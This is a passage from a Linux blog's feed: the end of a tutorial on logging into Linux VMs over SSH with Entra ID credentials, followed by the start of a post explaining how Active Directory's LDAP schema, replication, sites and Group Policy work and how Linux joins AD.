<li>Conditional Access Policies can gate Linux logins — MFA, device compliance, location restrictions — the same policies as for web apps</li>
<li>Two login modes: interactive (browser-based device code, for non-Azure VMs) and integrated (Azure IMDS-based, for Azure VMs)</li>
<li>Required roles: <code class="" data-line="">Virtual Machine Administrator Login</code> or <code class="" data-line="">Virtual Machine User Login</code> on the VM — IAM, not local sudoers</li>
</ul>
<hr />
<h2 id="the-big-picture-how-entra-id-linux-login-works">The Big Picture: How Entra ID Linux Login Works</h2>
<pre><code class="" data-line="">User: ssh vamshi@vm.corp.azure.com

  sshd on Linux VM
      │
      ▼
  PAM (/etc/pam.d/sshd)
      │
      ├── pam_aad.so (auth)
      │     │
      │     │  OIDC device code flow:
      │     │  &quot;Go to microsoft.com/devicelogin and enter code ABCD-1234&quot;
      │     │  User authenticates in browser with MFA
      │     │  Entra ID issues id_token + access_token
      │     ▼
      │   pam_aad validates token:
      │     • signature (JWKS from Entra ID)
      │     • tenant ID (iss claim)
      │     • VM resource audience (aud claim)
      │     • group membership (groups claim)
      │
      └── pam_mkhomedir (session)
            Creates /home/vamshi@corp.com on first login

  Shell session created
  whoami → vamshi_corp_com (sanitized UPN for Linux username)
</code></pre>
<p>EP11 mapped the IdP landscape. This episode gets specific: Entra ID and Linux. Understanding this matters because Entra ID is increasingly where enterprise identities live, and cloud VMs that SSH into with local accounts are an operational and security liability.</p>
<hr />
<h2 id="entra-id-vs-active-directory-whats-different">Entra ID vs Active Directory: What&#8217;s Different</h2>
<p>This distinction matters before configuring anything.</p>
<table>
<thead>
<tr>
<th></th>
<th>Active Directory (on-prem)</th>
<th>Entra ID (cloud)</th>
</tr>
</thead>
<tbody>
<tr>
<td>Protocol</td>
<td>LDAP + Kerberos</td>
<td>OIDC + OAuth2</td>
</tr>
<tr>
<td>Directory queries</td>
<td><code class="" data-line="">ldapsearch</code></td>
<td>Microsoft Graph API</td>
</tr>
<tr>
<td>Linux join</td>
<td><code class="" data-line="">realm join</code> (adcli + SSSD)</td>
<td><code class="" data-line="">aad-auth</code> package</td>
</tr>
<tr>
<td>Authentication</td>
<td>Kerberos tickets</td>
<td>JWT tokens</td>
</tr>
<tr>
<td>Group policy</td>
<td>GPO via Sysvol</td>
<td>Conditional Access + Intune</td>
</tr>
<tr>
<td>Network requirement</td>
<td>DC reachable on LAN/VPN</td>
<td>HTTPS to login.microsoftonline.com</td>
</tr>
</tbody>
</table>
<p>Entra ID has no LDAP interface and no Kerberos realm. You cannot run <code class="" data-line="">ldapsearch</code> against it. You cannot <code class="" data-line="">kinit</code> to it. The authentication protocol is entirely OIDC/OAuth2 — the same protocol your browser uses to &#8220;Login with Microsoft.&#8221;</p>
<p>If you need LDAP and Kerberos from Azure, that&#8217;s <strong>Azure AD Domain Services</strong> — a separate managed service that Microsoft runs, which does speak LDAP and Kerberos. It&#8217;s not Entra ID; it&#8217;s a managed AD replica in Azure. EP12 covers the Entra ID path — the modern, protocol-native approach.</p>
<hr />
<h2 id="prerequisites">Prerequisites</h2>
<pre><code class="" data-line=""># Azure side:
# 1. The VM&#039;s managed identity must be enabled (System-assigned)
# 2. Two Entra ID roles assigned on the VM resource:
#    - &quot;Virtual Machine Administrator Login&quot; (for sudo access)
#    - &quot;Virtual Machine User Login&quot; (for regular access)
# 3. Conditional Access policies that apply to the VM login scope

# VM side (Ubuntu 20.04+ / RHEL 8+):
# Install the aad-auth package (Microsoft-maintained)
curl -sSL https://packages.microsoft.com/keys/microsoft.asc \
  | gpg --dearmor -o /usr/share/keyrings/microsoft.gpg
echo &quot;deb [signed-by=/usr/share/keyrings/microsoft.gpg] \
  https://packages.microsoft.com/ubuntu/22.04/prod jammy main&quot; \
  &gt; /etc/apt/sources.list.d/microsoft.list
apt-get update &amp;&amp; apt-get install -y aad-auth
</code></pre>
<hr />
<h2 id="configuration">Configuration</h2>
<pre><code class="" data-line=""># Configure the aad-auth package
aad-auth configure \
  --tenant-id 12345678-1234-1234-1234-123456789abc \
  --app-id 87654321-4321-4321-4321-cba987654321

# This writes /etc/aad.conf:
# [aad]
# tenant_id = 12345678-...
# app_id = 87654321-...
# version = 1

# Verify the PAM configuration was updated
grep pam_aad /etc/pam.d/common-auth
# auth [success=1 default=ignore] pam_aad.so
</code></pre>
<p>The <code class="" data-line="">aad-auth</code> package installs <code class="" data-line="">pam_aad.so</code> and configures PAM automatically. It also modifies <code class="" data-line="">/etc/nsswitch.conf</code> to add <code class="" data-line="">aad</code> as a source for <code class="" data-line="">passwd</code> lookups — so <code class="" data-line="">getent passwd vamshi@corp.com</code> works after the first login.</p>
<hr />
<h2 id="the-login-flow">The Login Flow</h2>
<h3 id="on-an-azure-vm-integrated-mode">On an Azure VM (Integrated mode)</h3>
<p>Azure VMs have access to the Instance Metadata Service (IMDS) at <code class="" data-line="">169.254.169.254</code>. <code class="" data-line="">pam_aad</code> uses the VM&#8217;s managed identity to get a token from IMDS, which proves the VM is trusted, then validates the user&#8217;s token against the tenant.</p>
<pre><code class="" data-line=""># User SSHes with username as UPN (user@tenant.onmicrosoft.com or user@corp.com)
ssh vamshi@corp.com@vm.eastus.cloudapp.azure.com

# Or use the short form if the tenant is configured:
ssh vamshi@corp.com@vm.eastus.cloudapp.azure.com
</code></pre>
<p>On first connection, <code class="" data-line="">pam_aad</code> initiates the device code flow:</p>
<pre><code class="" data-line="">To sign in, use a web browser to open https://microsoft.com/devicelogin
and enter the code ABCD-1234 to authenticate.
</code></pre>
<p>The user opens the URL in any browser (on any device), enters the code, and authenticates with their Entra ID credentials + MFA. The SSH session gets a token. Subsequent logins within the token cache TTL skip the device code step.</p>
<h3 id="username-format-on-the-linux-system">Username format on the Linux system</h3>
<p>Entra ID usernames (UPNs) contain <code class="" data-line="">@</code> — not valid in Linux usernames. <code class="" data-line="">aad-auth</code> sanitizes the UPN:</p>
<pre><code class="" data-line="">vamshi@corp.com → vamshi_corp_com    (default)
# or, with shorter_username enabled in /etc/aad.conf:
vamshi@corp.com → vamshi
</code></pre>
<p>The UID is derived from the Azure AD Object ID (a deterministic hash) — stable across logins, same UID on every VM in the tenant.</p>
<hr />
<h2 id="conditional-access-for-linux-logins">Conditional Access for Linux Logins</h2>
<p>Conditional Access Policies in Entra ID apply to Linux VM logins the same way they apply to web app logins.</p>
<pre><code class="" data-line="">Policy: Require MFA for Linux VM Login
  Conditions:
    Cloud apps: &quot;Azure Linux Virtual Machine Sign-In&quot;
    Users: All users (or specific groups)
  Grant:
    Require multi-factor authentication
    Require compliant device (optional)
</code></pre>
<p>With this policy, every SSH login triggers MFA — regardless of whether the client machine supports it. The MFA challenge appears in the device code flow (the browser window the user opens).</p>
<p>You can also enforce:<br />
&#8211; <strong>Location restrictions</strong> — only from corporate IP ranges<br />
&#8211; <strong>Device compliance</strong> — device must be Intune-managed<br />
&#8211; <strong>Sign-in risk</strong> — block logins flagged as risky by Entra ID Identity Protection</p>
<p>This is the operational shift: Linux login security is now managed in the same Conditional Access policy engine as every other Entra ID-protected resource. No more per-machine PAM configuration for MFA.</p>
<hr />
<h2 id="role-based-access-who-can-log-in">Role-Based Access: Who Can Log In</h2>
<p>Access to the VM is controlled by Azure RBAC — not by local Linux groups or sudoers.</p>
<pre><code class="" data-line=""># Grant a user SSH access to the VM
az role assignment create \
  --assignee vamshi@corp.com \
  --role &quot;Virtual Machine User Login&quot; \
  --scope /subscriptions/SUB_ID/resourceGroups/RG/providers/Microsoft.Compute/virtualMachines/VM_NAME

# Grant admin (sudo) access
az role assignment create \
  --assignee vamshi@corp.com \
  --role &quot;Virtual Machine Administrator Login&quot; \
  --scope /subscriptions/SUB_ID/...
</code></pre>
<p><code class="" data-line="">Virtual Machine Administrator Login</code> maps to the <code class="" data-line="">sudo</code> group on the Linux VM. Users with this role get passwordless sudo. Users with <code class="" data-line="">Virtual Machine User Login</code> get a regular shell.</p>
<p>The mapping is enforced by <code class="" data-line="">pam_aad</code> checking the <code class="" data-line="">groups</code> claim in the token against the configured admin group. No <code class="" data-line="">/etc/sudoers.d/</code> files needed.</p>
<hr />
<h2 id="debugging-entra-id-linux-logins">Debugging Entra ID Linux Logins</h2>
<pre><code class="" data-line=""># Check aad-auth service status
systemctl status aad-auth

# View aad-auth logs
journalctl -u aad-auth -f

# Attempt a manual token validation (requires aad-auth debug mode)
aad-auth login --username vamshi@corp.com

# Check the local user cache
getent passwd vamshi_corp_com
# Returns if the user has logged in before

# Clear the local cache (forces re-authentication)
aad-auth clean-cache

# Verify Conditional Access isn&#039;t blocking (check Entra ID Sign-in logs)
# Azure Portal → Entra ID → Sign-in logs → filter by user + app &quot;Azure Linux VM Sign-In&quot;
</code></pre>
<p>The Entra ID Sign-in logs in the Azure Portal show every authentication attempt, the Conditional Access policies that evaluated, which ones passed/failed, and the exact failure reason. This is far more diagnostic than reading PAM logs.</p>
<hr />
<h2 id="entra-id-connect-bringing-on-prem-users-to-entra-id">Entra ID Connect: Bringing On-Prem Users to Entra ID</h2>
<p>For organizations with existing on-prem AD who want to enable Entra ID Linux login:</p>
<pre><code class="" data-line="">On-prem AD users → Entra ID Connect sync → Entra ID
                                                │
                                    Linux VM login (aad-auth)
</code></pre>
<p>Entra ID Connect is a Windows Server application that syncs users from on-prem AD to Entra ID every 30 minutes. Users authenticate against Entra ID (which validates against AD via Password Hash Sync, Pass-Through Authentication, or Federation). The Linux VM doesn&#8217;t know or care — it sees an Entra ID token.</p>
<p>With Password Hash Sync: password hashes (not plaintext) are synced to Entra ID — users authenticate directly in the cloud.<br />
With Pass-Through Authentication: Entra ID forwards authentication requests to an on-prem agent that validates against AD — no password hashes leave the datacenter.<br />
With Federation (AD FS / Entra ID as a relying party): Entra ID delegates authentication to AD FS — the most complex, the most on-prem control.</p>
<hr />
<h2 id="common-misconceptions"><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/26a0.png" alt="⚠" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Common Misconceptions</h2>
<p><strong>&#8220;Entra ID = Azure Active Directory = Active Directory.&#8221;</strong> Three different things. Active Directory: on-prem, LDAP+Kerberos. Azure AD (now Entra ID): cloud, OIDC+OAuth2. Azure AD Domain Services: managed AD replica in Azure, LDAP+Kerberos, not Entra ID.</p>
<p><strong>&#8220;You need Azure AD DS to join Linux to Azure.&#8221;</strong> Azure AD DS is the managed AD service. Entra ID Linux login (via aad-auth) is entirely separate and doesn&#8217;t require AD DS. You can authenticate Linux to Entra ID directly via OIDC.</p>
<p><strong>&#8220;The Linux username matches the Entra ID username.&#8221;</strong> The UPN is sanitized (<code class="" data-line="">@</code> → <code class="" data-line="">_</code>) to produce a valid Linux username. The canonical identity is the UPN or the Entra Object ID. Don&#8217;t hardcode the sanitized username in scripts.</p>
<hr />
<h2 id="framework-alignment">Framework Alignment</h2>
<table>
<thead>
<tr>
<th>Domain</th>
<th>Relevance</th>
</tr>
</thead>
<tbody>
<tr>
<td>CISSP Domain 5: Identity and Access Management</td>
<td>Entra ID Linux login centralizes Linux VM access in the same IAM system as all other enterprise resources — one policy engine, one audit log</td>
</tr>
<tr>
<td>CISSP Domain 3: Security Architecture and Engineering</td>
<td>Eliminating per-VM local accounts removes a class of credential management risk — no SSH keys to rotate, no local accounts to audit</td>
</tr>
<tr>
<td>CISSP Domain 1: Security and Risk Management</td>
<td>Conditional Access Policies enforcing MFA on Linux logins reduce the risk of credential-based compromise of cloud VMs</td>
</tr>
</tbody>
</table>
<hr />
<h2 id="key-takeaways">Key Takeaways</h2>
<ul>
<li>Entra ID Linux login uses OIDC device code flow — no LDAP, no Kerberos, no local Linux accounts</li>
<li><code class="" data-line="">aad-auth</code> package installs <code class="" data-line="">pam_aad.so</code> and handles the full authentication stack: token issuance, validation, user cache, UID mapping</li>
<li>VM access is controlled by Azure RBAC roles (<code class="" data-line="">Virtual Machine Administrator Login</code> / <code class="" data-line="">Virtual Machine User Login</code>) — not by sudoers files</li>
<li>Conditional Access Policies apply to Linux VM logins — MFA, device compliance, and location restrictions use the same engine as every other Entra ID app</li>
<li>Debugging starts in Entra ID Sign-in logs (Azure Portal), not in <code class="" data-line="">/var/log/auth.log</code></li>
</ul>
<hr />
<h2 id="whats-next">What&#8217;s Next</h2>
<p>EP12 showed how Entra ID enables Linux logins in the cloud. EP13 is the series closer: Zero Trust identity — what it means to verify identity continuously, how SPIFFE and SPIRE handle workload (non-human) identity, and where the stack goes from <code class="" data-line="">/etc/passwd</code> in 1970 to a Zero Trust policy engine in 2026.</p>
<p><em>Next: <a href="/zero-trust-identity-spiffe-spire/">Zero Trust Identity: SPIFFE, SPIRE, mTLS, and Continuous Verification</a></em></p>
<p>Get EP13 in your inbox when it publishes → <a href="https://linuxcent.com/subscribe">linuxcent.com/subscribe</a></p>
<p><a class="a2a_button_mastodon" href="https://www.addtoany.com/add_to/mastodon?linkurl=https%3A%2F%2Flinuxcent.com%2Fentra-id-linux-login%2F&amp;linkname=Entra%20ID%20Linux%20Login%3A%20SSH%20Authentication%20with%20Azure%20AD%20Credentials" title="Mastodon" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Flinuxcent.com%2Fentra-id-linux-login%2F&amp;linkname=Entra%20ID%20Linux%20Login%3A%20SSH%20Authentication%20with%20Azure%20AD%20Credentials" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Flinuxcent.com%2Fentra-id-linux-login%2F&amp;linkname=Entra%20ID%20Linux%20Login%3A%20SSH%20Authentication%20with%20Azure%20AD%20Credentials" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Flinuxcent.com%2Fentra-id-linux-login%2F&amp;linkname=Entra%20ID%20Linux%20Login%3A%20SSH%20Authentication%20with%20Azure%20AD%20Credentials" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Flinuxcent.com%2Fentra-id-linux-login%2F&amp;linkname=Entra%20ID%20Linux%20Login%3A%20SSH%20Authentication%20with%20Azure%20AD%20Credentials" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Flinuxcent.com%2Fentra-id-linux-login%2F&amp;linkname=Entra%20ID%20Linux%20Login%3A%20SSH%20Authentication%20with%20Azure%20AD%20Credentials" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Flinuxcent.com%2Fentra-id-linux-login%2F&amp;linkname=Entra%20ID%20Linux%20Login%3A%20SSH%20Authentication%20with%20Azure%20AD%20Credentials" title="Copy Link" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share#url=https%3A%2F%2Flinuxcent.com%2Fentra-id-linux-login%2F&#038;title=Entra%20ID%20Linux%20Login%3A%20SSH%20Authentication%20with%20Azure%20AD%20Credentials" data-a2a-url="https://linuxcent.com/entra-id-linux-login/" data-a2a-title="Entra ID Linux Login: SSH Authentication with Azure AD Credentials"></a></p><p>The post <a href="https://linuxcent.com/entra-id-linux-login/">Entra ID Linux Login: SSH Authentication with Azure AD Credentials</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://linuxcent.com/entra-id-linux-login/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1805</post-id>	</item>
		<item>
		<title>How Active Directory Works: LDAP, Kerberos, and Group Policy Under the Hood</title>
		<link>https://linuxcent.com/active-directory-ldap-kerberos/</link>
					<comments>https://linuxcent.com/active-directory-ldap-kerberos/#respond</comments>
		
		<dc:creator><![CDATA[Vamshi Krishna Santhapuri]]></dc:creator>
		<pubDate>Thu, 07 May 2026 11:00:00 +0000</pubDate>
				<category><![CDATA[Identity & Authentication]]></category>
		<category><![CDATA[Active Directory]]></category>
		<category><![CDATA[Identity Management]]></category>
		<category><![CDATA[Kerberos]]></category>
		<category><![CDATA[LDAP]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Windows]]></category>
		<guid isPermaLink="false">https://linuxcent.com/?p=1796</guid>

					<description><![CDATA[<p><span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 6</span> <span class="rt-label rt-postfix">minutes</span></span>How Active Directory works under the hood: LDAP storage, Kerberos authentication, USN replication, KCC site topology, GPO delivery — and how Linux joins it.</p>
<p>The post <a href="https://linuxcent.com/active-directory-ldap-kerberos/">How Active Directory Works: LDAP, Kerberos, and Group Policy Under the Hood</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></description>
										<content:encoded><![CDATA[<span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 6</span> <span class="rt-label rt-postfix">minutes</span></span><style>
pre{position:relative;background:#1e1e1e;color:#d4d4d4;
    padding:16px 16px 16px 20px;border-radius:6px;overflow-x:auto;
    font-family:'JetBrains Mono','Fira Code','Cascadia Code',Consolas,'Courier New',monospace;
    font-size:.88em;line-height:1.6;border-left:4px solid #555}
code{background:#f4f4f4;padding:2px 5px;border-radius:3px;font-size:.9em}
pre code{background:transparent;padding:0;color:inherit}
pre[data-lang="bash"],pre[data-lang="sh"],
pre[data-lang="shell"],pre[data-lang="zsh"]{border-left-color:#4ec9b0}
pre[data-lang="yaml"],pre[data-lang="json"],
pre[data-lang="toml"],pre[data-lang="xml"]{border-left-color:#569cd6}
pre[data-lang="python"],pre[data-lang="go"],pre[data-lang="rust"],
pre[data-lang="java"],pre[data-lang="c"],pre[data-lang="cpp"]{border-left-color:#c586c0}
pre[data-lang="text"],pre[data-lang="output"],
pre[data-lang="console"]{border-left-color:#888}
.lc-copy-btn{position:absolute;top:8px;right:8px;background:#2d2d2d;color:#ccc;
    border:1px solid #444;border-radius:4px;padding:3px 9px;font-size:.75em;
    font-family:system-ui,sans-serif;cursor:pointer;opacity:0;
    transition:opacity .15s,background .15s;line-height:1.6}
pre:hover .lc-copy-btn{opacity:1}
.lc-copy-btn:hover{background:#3a3a3a;color:#fff}
.lc-copy-btn.copied{color:#4ec9b0;border-color:#4ec9b0}
.lc-lang-badge{position:absolute;top:8px;left:20px;font-family:system-ui,sans-serif;
    font-size:.7em;color:#666;text-transform:uppercase;letter-spacing:.04em;
    line-height:1;pointer-events:none;opacity:0;transition:opacity .15s}
pre:hover .lc-lang-badge{opacity:1}
table{border-collapse:collapse;width:100%;margin:16px 0}
th,td{border:1px solid #ddd;padding:10px 14px;text-align:left}
th{background:#f0f0f0;font-weight:600}
tr:nth-child(even){background:#fafafa}
</style>
<p><script>
(function(){
  if(window.__lcCodeEnhanced)return;
  window.__lcCodeEnhanced=true;
  function enhance(){
    document.querySelectorAll('pre').forEach(function(pre){
      var code=pre.querySelector('code');
      var lang='';
      if(code){var m=(code.className||'').match(/language-(\S+)/);if(m)lang=m[1].toLowerCase();}
      if(lang)pre.setAttribute('data-lang',lang);
      if(lang){var badge=document.createElement('span');badge.className='lc-lang-badge';badge.textContent=lang;pre.insertBefore(badge,pre.firstChild);}
      var btn=document.createElement('button');
      btn.className='lc-copy-btn';btn.textContent='Copy';btn.setAttribute('aria-label','Copy code to clipboard');
      pre.appendChild(btn);
      btn.addEventListener('click',function(){
        var text=code?code.innerText:pre.innerText;
        if(navigator.clipboard&&window.isSecureContext){
          navigator.clipboard.writeText(text).then(function(){ok(btn);}).catch(function(){fb(text,btn);});
        }else{fb(text,btn);}
      });
    });
  }
  function ok(btn){btn.textContent='Copied!';btn.classList.add('copied');setTimeout(function(){btn.textContent='Copy';btn.classList.remove('copied');},2000);}
  function fb(text,btn){
    try{var ta=document.createElement('textarea');ta.value=text;ta.style.cssText='position:fixed;left:-9999px;top:-9999px;opacity:0';document.body.appendChild(ta);ta.select();document.execCommand('copy');document.body.removeChild(ta);ok(btn);}
    catch(e){btn.textContent='✗ Failed';setTimeout(function(){btn.textContent='Copy';},2000);}
  }
  if(document.readyState==='loading'){document.addEventListener('DOMContentLoaded',enhance);}else{enhance();}
})();
</script></p>
<p><em>The Identity Stack, Episode 9</em><br />
<a href="/freeipa-linux-identity-management/">EP08: FreeIPA</a> → <strong>EP09</strong> → <a href="/saml-vs-oidc-vs-oauth2/">EP10: SAML/OIDC</a> → &#8230;</p>
<hr />
<h2 id="tldr">TL;DR</h2>
<ul>
<li>Active Directory is not a product that happens to use LDAP — it <em>is</em> an LDAP directory with a Microsoft-extended schema, a built-in Kerberos KDC, and DNS tightly integrated</li>
<li>Replication uses USNs (Update Sequence Numbers) and GUIDs — the Knowledge Consistency Checker (KCC) automatically builds the replication topology</li>
<li>Sites and site links tell AD which DCs are physically close — AD prefers to authenticate users against a DC in the same site to minimize WAN latency</li>
<li>Group Policy Objects (GPOs) are stored as LDAP entries (in the <code class="" data-line="">CN=Policies</code> container) and Sysvol files — LDAP tells clients which GPOs apply; Sysvol delivers the policy files</li>
<li>Linux joins AD via <code class="" data-line="">realm join</code> (uses adcli + SSSD) or <code class="" data-line="">net ads join</code> (Samba + winbind) — both register a machine account in AD and get a Kerberos keytab</li>
<li>The difference between Linux in AD and Linux in FreeIPA: AD is optimized for Windows; FreeIPA is optimized for Linux — both interoperate</li>
</ul>
<hr />
<h2 id="the-big-picture-what-ad-actually-is">The Big Picture: What AD Actually Is</h2>
<pre><code class="" data-line="">Active Directory Domain: corp.com
┌────────────────────────────────────────────────────────────┐
│                                                            │
│  LDAP directory          Kerberos KDC                      │
│  ─────────────           ──────────                        │
│  Schema: 1000+ classes   Realm: CORP.COM                   │
│  Objects: users, groups, Issues TGTs + service tickets     │
│  computers, GPOs, OUs    Uses LDAP as the account DB       │
│                                                            │
│  DNS                     Sysvol (DFS share)                │
│  ────                    ────────────────                  │
│  SRV records for KDC     GPO templates                     │
│  and LDAP discovery      Login scripts                     │
│                          Replicated via DFSR               │
│                                                            │
│  Replication engine: USN + GUID + KCC                      │
└────────────────────────────────────────────────────────────┘
          │ replicates to          │ replicates to
          ▼                        ▼
   DC: dc02.corp.com        DC: dc03.corp.com
</code></pre>
<p>EP08 showed FreeIPA as the Linux-native answer to enterprise identity. AD is the Microsoft answer — and because most enterprises run Windows clients, understanding AD is unavoidable for Linux infrastructure engineers. This episode goes behind the LDAP and Kerberos protocols to explain what makes AD specifically work.</p>
<hr />
<h2 id="the-ad-schema-ldap-with-1000-object-classes">The AD Schema: LDAP With 1000+ Object Classes</h2>
<p>AD&#8217;s schema extends the base LDAP schema with Microsoft-specific classes and attributes. Every user object is a <code class="" data-line="">user</code> class (which extends <code class="" data-line="">organizationalPerson</code> which extends <code class="" data-line="">person</code> which extends <code class="" data-line="">top</code>) with additional attributes like:</p>
<pre><code class="" data-line="">sAMAccountName   ← the pre-Windows 2000 login name (vamshi)
userPrincipalName ← the modern UPN (vamshi@corp.com)
objectGUID       ← a globally unique 128-bit identifier (never changes, even if DN changes)
objectSid        ← Windows Security Identifier (used for ACL enforcement on Windows)
whenCreated      ← creation timestamp
pwdLastSet       ← password change timestamp
userAccountControl ← bitmask: disabled, locked, password never expires, etc.
memberOf         ← back-link: groups this user belongs to
</code></pre>
<p><code class="" data-line="">objectGUID</code> is the authoritative identifier in AD — not the DN. When a user is renamed or moved to a different OU, the GUID stays the same. Applications that store a user&#8217;s DN will break on rename; applications that store the GUID won&#8217;t.</p>
<p><code class="" data-line="">userAccountControl</code> is the bitmask that controls account state:</p>
<pre><code class="" data-line="">Flag          Value   Meaning
ACCOUNTDISABLE  2     Account disabled
LOCKOUT         16    Account locked out
PASSWD_NOTREQD  32    Password not required
NORMAL_ACCOUNT  512   Normal user account (set on almost all accounts)
DONT_EXPIRE_PASSWD 65536  Password never expires
</code></pre>
<pre><code class="" data-line=""># Query AD from a Linux machine
ldapsearch -x -H ldap://dc.corp.com \
  -D &quot;vamshi@corp.com&quot; -w password \
  -b &quot;dc=corp,dc=com&quot; \
  &quot;(sAMAccountName=vamshi)&quot; \
  sAMAccountName userPrincipalName objectGUID memberOf userAccountControl
</code></pre>
<hr />
<h2 id="replication-usn-guid-kcc">Replication: USN + GUID + KCC</h2>
<p>AD replication is multi-master — every DC accepts writes. The replication engine uses:</p>
<p><strong>USN (Update Sequence Number)</strong> — a per-DC counter that increments on every local write. Each attribute in the directory stores the USN at which it was last modified (<code class="" data-line="">uSNChanged</code>, <code class="" data-line="">uSNCreated</code>). When DC-A replicates to DC-B, DC-B asks: &#8220;give me everything you&#8217;ve changed since the last USN I saw from you.&#8221;</p>
<p><strong>GUID</strong> — each object has a globally unique identifier. If the same attribute is modified on two DCs before replication (a conflict), the conflict is resolved: last-writer-wins at the attribute level, based on the modification timestamp. If timestamps are equal, the attribute value from the DC with the lexicographically higher GUID wins.</p>
<p><strong>KCC (Knowledge Consistency Checker)</strong> — a component that runs on every DC and automatically constructs the replication topology. You don&#8217;t configure which DCs replicate to which — the KCC builds a minimum spanning tree that ensures every DC is connected to every other within a set number of hops. You configure Sites and site links; the KCC does the rest.</p>
<pre><code class="" data-line=""># Check replication status from a Linux machine (requires rpcclient or adcli)
# Or on the DC: repadmin /showrepl (Windows tool)

# Simulate: query the highestCommittedUSN from a DC
ldapsearch -x -H ldap://dc.corp.com \
  -D &quot;vamshi@corp.com&quot; -w password \
  -b &quot;&quot; -s base highestCommittedUSN
</code></pre>
<hr />
<h2 id="sites-and-site-links">Sites and Site Links</h2>
<p>Sites are AD&#8217;s concept of physical network topology. A site is a set of IP subnets with high-bandwidth connectivity between them. Site links represent the WAN connections between sites.</p>
<pre><code class="" data-line="">Site: Mumbai              Site: Hyderabad
┌────────────────┐        ┌────────────────┐
│ DC: dc-mum-01  │        │ DC: dc-hyd-01  │
│ DC: dc-mum-02  │        │ DC: dc-hyd-02  │
│ subnet: 10.1/16│        │ subnet: 10.2/16│
└───────┬────────┘        └────────┬───────┘
        │                          │
        └──── Site Link ───────────┘
              Cost: 100
              Replication interval: 15 min
</code></pre>
<p>When a user in Mumbai authenticates, AD&#8217;s KDC locates a DC in the same site using DNS SRV records. The SRV records include the site name in the service name: <code class="" data-line="">_ldap._tcp.Mumbai._sites.dc._msdcs.corp.com</code>. SSSD and Windows clients query site-local SRV records first.</p>
<p>If no DC is available in the local site, authentication falls back to a DC in another site across the WAN link. Configuring sites correctly prevents remote authentication failures from killing local operations.</p>
<hr />
<h2 id="group-policy-ldap-sysvol">Group Policy: LDAP + Sysvol</h2>
<p>GPOs are stored in two places:</p>
<p><strong>LDAP</strong> — the <code class="" data-line="">CN=Policies,CN=System,DC=corp,DC=com</code> container holds GPO metadata objects. Each GPO has a GUID, a display name, and version numbers. The <code class="" data-line="">gPLink</code> attribute on OUs and the domain root links GPOs to where they apply.</p>
<p><strong>Sysvol</strong> — the actual policy templates and scripts live in <code class="" data-line="">\\corp.com\SYSVOL\corp.com\Policies\{GPO-GUID}\</code>. Sysvol is a DFS-R (Distributed File System Replication) share replicated to every DC.</p>
<p>When a Windows client applies Group Policy:<br />
1. LDAP query: what GPOs are linked to my OU chain?<br />
2. Sysvol fetch: download the policy templates from the GPO&#8217;s Sysvol path<br />
3. Apply: process Registry settings, Security settings, Scripts</p>
<p>Linux clients don&#8217;t process GPOs natively. The <code class="" data-line="">adcli</code> and <code class="" data-line="">sssd</code> tools interpret a small subset of AD policy (password policy, account lockout) via LDAP. Full GPO processing on Linux requires Samba&#8217;s <code class="" data-line="">samba-gpupdate</code> or third-party tools.</p>
<hr />
<h2 id="joining-linux-to-ad">Joining Linux to AD</h2>
<h3 id="realm-join-recommended">realm join (recommended)</h3>
<pre><code class="" data-line=""># Install required packages
dnf install -y realmd sssd adcli samba-common

# Discover the domain
realm discover corp.com
# corp.com
#   type: kerberos
#   realm-name: CORP.COM
#   domain-name: corp.com
#   configured: no
#   server-software: active-directory
#   client-software: sssd

# Join
realm join corp.com -U Administrator
# Prompts for Administrator password
# Creates machine account in AD
# Configures sssd.conf, krb5.conf, nsswitch.conf, pam.d automatically

# Verify
realm list
id vamshi@corp.com
</code></pre>
<h3 id="what-the-join-does">What the join does:</h3>
<ol>
<li>Creates a machine account <code class="" data-line="">HOSTNAME$</code> in <code class="" data-line="">CN=Computers,DC=corp,DC=com</code></li>
<li>Sets a machine password (rotated automatically by SSSD)</li>
<li>Retrieves a Kerberos keytab to <code class="" data-line="">/etc/krb5.keytab</code></li>
<li>Configures SSSD with <code class="" data-line="">id_provider = ad</code>, <code class="" data-line="">auth_provider = ad</code></li>
<li>Updates <code class="" data-line="">/etc/nsswitch.conf</code> to include <code class="" data-line="">sss</code></li>
<li>Updates <code class="" data-line="">/etc/pam.d/</code> to include <code class="" data-line="">pam_sss</code></li>
</ol>
<p>After joining, SSSD uses the machine&#8217;s Kerberos keytab to authenticate to the DC and query LDAP — no hardcoded service account credentials required.</p>
<hr />
<h2 id="ldap-queries-against-ad-from-linux">LDAP Queries Against AD from Linux</h2>
<pre><code class="" data-line=""># Find a user (after kinit or with -w password)
ldapsearch -Y GSSAPI -H ldap://dc.corp.com \
  -b &quot;dc=corp,dc=com&quot; \
  &quot;(sAMAccountName=vamshi)&quot; \
  sAMAccountName mail memberOf

# Find all members of a group
ldapsearch -Y GSSAPI -H ldap://dc.corp.com \
  -b &quot;dc=corp,dc=com&quot; \
  &quot;(cn=engineers)&quot; \
  member

# Find all AD-joined Linux machines
